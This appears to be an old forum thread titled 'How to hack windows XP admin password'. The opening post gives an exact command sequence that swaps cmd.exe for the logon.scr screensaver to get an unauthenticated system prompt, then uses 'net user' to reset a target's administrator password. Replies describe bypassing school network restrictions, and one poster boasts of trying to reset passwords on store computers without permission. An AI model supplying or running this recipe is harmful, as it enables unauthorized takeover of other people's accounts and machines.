How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

I use a Registry Unhook to get into the registry and you can search "DisableCMD" and change the value to 1 to get acess. The unhook is from Symantec. You can give it a shot. Its an .inf instead of a .bat so you have to right click and then hit install.

when I was in highschool, we were on a Novell Network and we (the students) used to use windows messenger to talk to each other from different classrooms. the admin caught on to it so they disabled the "run" program as well as other things for the students' accounts. Well, we figured out that we could just click cancel on the novell login screen, still get into windows, then login to the network once we were into windows and have full access to all our favorite programs as well as those on the network. Their program disabling only worked if we had logged into the network before logging into the OS. I wouldn't really call that hacking, just a useful trick to stick it to the man.

No, the way I look at hacking is me sitting at my computer and viewing everything on yours. Like taking advantage of RDP running on some dummies computer, its really nothing that I have a need for unless you just want me to help you fix something on your computer without me being there to see the messy room you have it in.

I tried to reset the passwords on most of the computers at Staples and i almost did until the guy caught me and started to yell at me :lol:
